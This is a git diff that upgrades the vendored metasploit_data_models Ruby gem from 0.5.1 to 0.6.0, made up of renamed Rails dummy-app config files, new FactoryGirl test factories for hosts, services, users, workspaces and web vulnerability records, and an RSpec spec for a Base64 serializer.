b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/application.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/application.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/application.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/boot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/boot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/boot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/database.yml.example similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/database.yml.example rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/database.yml.example diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environment.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environment.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environment.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/development.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/development.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/development.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/production.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/production.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/production.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/test.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/environments/test.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/test.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/backtrace_silencers.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/backtrace_silencers.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/backtrace_silencers.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/inflections.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/inflections.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/inflections.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/mime_types.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/mime_types.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/mime_types.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/secret_token.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/secret_token.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/secret_token.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/session_store.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/session_store.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/session_store.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/wrap_parameters.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/initializers/wrap_parameters.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/wrap_parameters.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/routes.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/config/routes.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/routes.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/db/schema.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/db/schema.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/db/schema.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/lib/assets/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/lib/assets/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/lib/assets/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/log/.gitkeep similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/log/.gitkeep rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/log/.gitkeep diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/404.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/404.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/404.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/422.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/422.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/422.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/500.html similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/500.html rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/500.html diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/favicon.ico similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/public/favicon.ico rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/public/favicon.ico diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/dummy/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/script/rails diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb new file mode 100644 index 0000000000..32112b667f --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/addresses.rb @@ -0,0 +1,7 @@ +FactoryGirl.define do + sequence :mdm_ipv4_address do |n| + max = 255 + + "192.168.#{(n / max).to_i}.#{n % max}" + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb new file mode 100644 index 0000000000..4eaa10e76d --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/hosts.rb @@ -0,0 +1,18 @@ +FactoryGirl.define do + factory :mdm_host, :class => Mdm::Host do + # + # Associations + # + association :workspace, :factory => :mdm_workspace + + # + # Attributes + # + address { generate :mdm_ipv4_address } + name { generate :mdm_host_name } + end + + sequence :mdm_host_name do |n| + "mdm_host_#{n}" + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb new file mode 100644 index 0000000000..0c7e02a593 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/services.rb @@ -0,0 +1,35 @@ +FactoryGirl.define do + factory :mdm_service, :class => Mdm::Service do + # + # Associations + # + association :host, :factory => :mdm_host + + # + # Attributes + # + port 4567 + proto 'snmp' + state 'open' + + factory :web_service do + proto 'tcp' + name { FactoryGirl.generate(:web_service_name) } + port { FactoryGirl.generate(:port) } + end + end + + port_bits = 16 + port_limit = 1 << port_bits + + sequence :port do |n| + n % port_limit + end + + web_service_names = ['http', 'https'] + web_service_name_count = web_service_names.length + + sequence :web_service_name do |n| + web_service_names[n % web_service_name_count] + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb new file mode 100644 index 0000000000..46179882b3 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/users.rb @@ -0,0 +1,22 @@ +FactoryGirl.define do + factory :mdm_user, :class => Mdm::User do + admin true + company "Interplanetary Teleportation, LTD" + email "rwillingham@itl.com" + fullname { generate :mdm_user_fullname } + phone "5123334444" + username { generate :mdm_user_username } + end + + factory :non_admin_mdm_user, :parent => :mdm_user do + admin false + end + + sequence :mdm_user_fullname do |n| + "Mdm User Fullname the #{n.ordinalize}" + end + + sequence :mdm_user_username do |n| + "mdm_user_username#{n}" + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb new file mode 100644 index 0000000000..071b83c451 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_sites.rb @@ -0,0 +1,8 @@ +FactoryGirl.define do + factory :mdm_web_site, :class => Mdm::WebSite do + # + # Associations + # + association :service, :factory => :mdm_service + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb new file mode 100644 index 0000000000..4bba254c7b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/web_vulns.rb @@ -0,0 +1,64 @@ +FactoryGirl.define do + factory :mdm_web_vuln, :class => Mdm::WebVuln do + # + # Associations + # + association :web_site, :factory => :mdm_web_site + + # + # Attributes + # + + category { generate :mdm_web_vuln_category } + confidence { generate :mdm_web_vuln_confidence } + method { generate :mdm_web_vuln_method } + name { generate :mdm_web_vuln_name } + path { generate :mdm_web_vuln_path } + params { generate :mdm_web_vuln_params } + pname { params.first.first } + proof { generate :mdm_web_vuln_proof } + risk { generate :mdm_web_vuln_risk } + end + + sequence :mdm_web_vuln_category do |n| + "mdm_web_vuln_category_#{n}" + end + + sequence :mdm_web_vuln_confidence do |n| + # range is from 1 to 100 so do mod 99 (0 - 99 range) and add 1 to get correct range + (n % 99) + 1 + end + + method_count = Mdm::WebVuln::METHODS.length + + sequence :mdm_web_vuln_method do |n| + Mdm::WebVuln::METHODS[n % method_count] + end + + sequence :mdm_web_vuln_name do |n| + "Web Vulnerability #{n}" + end + + sequence :mdm_web_vuln_path do |n| + "path/to/vulnerability/#{n}" + end + + sequence :mdm_web_vuln_params do |n| + [ + [ + "param#{n}", + "value#{n}" + ] + ] + end + + sequence :mdm_web_vuln_proof do |n| + "Mdm::WebVuln Proof #{n}" + end + + sequence :mdm_web_vuln_risk do |n| + # range is 0 .. 5 + n % 6 + + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb new file mode 100644 index 0000000000..38ffbc9077 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/factories/mdm/workspaces.rb @@ -0,0 +1,23 @@ +FactoryGirl.define do + factory :mdm_workspace, :class => Mdm::Workspace do + # + # Associations + # + association :owner, :factory => :mdm_user + + # + # Attributes + # + boundary { generate :mdm_ipv4_address } + description { generate :mdm_workspace_description } + name { generate :mdm_workspace_name } + end + + sequence :mdm_workspace_description do |n| + "Mdm::Workspace description #{n}" + end + + sequence :mdm_workspace_name do |n| + "Mdm::Workspace Name #{n}" + end +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb new file mode 100755 index 0000000000..89e48a684b --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/lib/base64_serializer_spec.rb @@ -0,0 +1,174 @@ +require "spec_helper" + +describe MetasploitDataModels::Base64Serializer do + let(:base64_marshaled) do + marshaled = Marshal.dump(unserialized) + + [ + marshaled + ].pack('m') + end + + let(:default) do + {} + end + + let(:unserialized) do + { + :foo => 'bar', + :baz => 'baz' + } + end + + let(:yaml) do + unserialized.to_yaml + end + + subject(:base64_serializer) do + described_class.new + end + + context 'CONSTANTS' do + it 'should define DEFAULT' do + described_class::DEFAULT.should == default + end + + context 'LOADERS' do + it 'should prefer base64 marshaled first' do + first = described_class::LOADERS[0] + deserialized = first.call(base64_marshaled) + + deserialized.should == unserialized + end + + it 'should fallback to the old YAML format second' do + second = described_class::LOADERS[1] + deserialized = second.call(yaml) + + deserialized.should == unserialized + end + + it 'should finally give up and just return the value' do + last = described_class::LOADERS.last + deserialized = last.call(unserialized) + + deserialized.should == unserialized + end + end + end + + context '#default' do + it 'should default to {}' do + base64_serializer.default.should == {} + end + + it 'should return a duplicate' do + duplicate = base64_serializer.default + value = mock('Value') + duplicate[:key] = value + + duplicate.should_not == base64_serializer.default + end + end + + context '#dump' do + it 'should output Base64 encoded marshaled data' do + dumped = base64_serializer.dump(unserialized) + + dumped.should == base64_marshaled + end + end + + context '#initialize' do + let(:attributes) do + {} + end + + subject(:base64_serializer) do + described_class.new(attributes) + end + + context 'with :default' do + let(:attributes) do + { + :default => default + } + end + + let(:default) do + [ + [ + 'param', + 'value' + ] + ] + end + + it 'should have :default in attributes' do + attributes.should have_key(:default) + end + + it 'should set default to :default value' do + base64_serializer.default.should == attributes[:default] + end + end + + context 'without :default' do + it 'should not have :default in attributes' do + attributes.should_not have_key(:default) + end + + it 'should default #default to DEFAULT' do + base64_serializer.default.should == default + end + end + end + + context '#load' do + context 'with nil' do + let(:serialized) do + nil + end + + it 'should return #default' do + default = mock('Default') + base64_serializer.stub(:default => default) + deserialized = base64_serializer.load(serialized) + + deserialized.should == default + end + end + + context 'with Base64 encoded marshaled' do + it 'should return unserialized' do + deserialized = base64_serializer.load(base64_marshaled) + + deserialized.should == unserialized + end + + end + + context 'with YAML' do + it 'should return unserialized' do + deserialized = base64_serializer.load(yaml) + + deserialized.should == unserialized + end + end + + context 'without Base64 encoded marshaled' do + context 'without YAML' do + let(:raw_value) do + "< a > b >" + end + + it 'should return raw value' do + deserialized = base64_serializer.load(raw_value) + + deserialized.should == raw_value + end + end + end + end +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/spec_helper.rb similarity index 66% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/spec_helper.rb index 32b4bef890..a619986a96 100755 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.5.1/spec/spec_helper.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/spec_helper.rb @@ -2,6 +2,8 @@ ENV['RAILS_ENV'] = 'test' require File.expand_path('../dummy/config/environment.rb', __FILE__) +require 'rspec/rails' +require 'rspec/autorun' require 'rubygems' require 'bundler' @@ -22,5 +24,12 @@ Dir.glob(support_glob) do |path| end RSpec.configure do |config| + config.before(:each) do + # Rex is only available when testing with metasploit-framework or pro, so stub out the methods that require it + Mdm::Workspace.any_instance.stub(:valid_ip_or_range? => true) + end + config.mock_with :rspec + config.use_transactional_fixtures = true + config.order = :random end diff --git a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec similarity index 97% rename from lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec rename to lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec index a88f2d9cd0..4a19d34025 100644 --- a/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.5.1.gemspec +++ b/lib/gemcache/ruby/1.9.1/specifications/metasploit_data_models-0.6.0.gemspec @@ -2,11 +2,11 @@ Gem::Specification.new do |s| s.name = "metasploit_data_models" - s.version = "0.5.1" + s.version = "0.6.0" s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= s.authors = ["Trevor Rosen"] - s.date = "2013-03-01" + s.date = "2013-03-06" s.description = "Implements minimal ActiveRecord models and database helper code used in both the Metasploit Framework (MSF) and Metasploit commercial editions." s.email = ["trevor_rosen@rapid7.com"] s.executables = ["mdm_console"]